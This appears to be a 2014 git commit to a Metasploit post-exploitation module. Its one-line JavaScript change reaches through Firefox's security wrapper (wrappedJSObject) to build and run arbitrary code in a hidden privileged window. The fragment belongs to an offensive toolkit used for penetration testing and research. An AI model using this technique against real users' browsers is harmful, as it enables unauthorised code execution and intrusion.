Make sure we unwrap the SecurityWrapper.

bug/bundler_fix
Joe Vennix 2014-01-12 10:46:23 -06:00
parent b3b04c4159
commit f78ec1eeb2
1 changed files with 1 additions and 1 deletions

View File

@ -69,7 +69,7 @@ class Metasploit3 < Msf::Post
} else {
setTimeout(function(){
try {
send(hiddenWindow.Function('send', src)(send));
send(hiddenWindow.wrappedJSObject.Function('send', src)(send));
} catch (e) {
send("Error: "+e.message);
}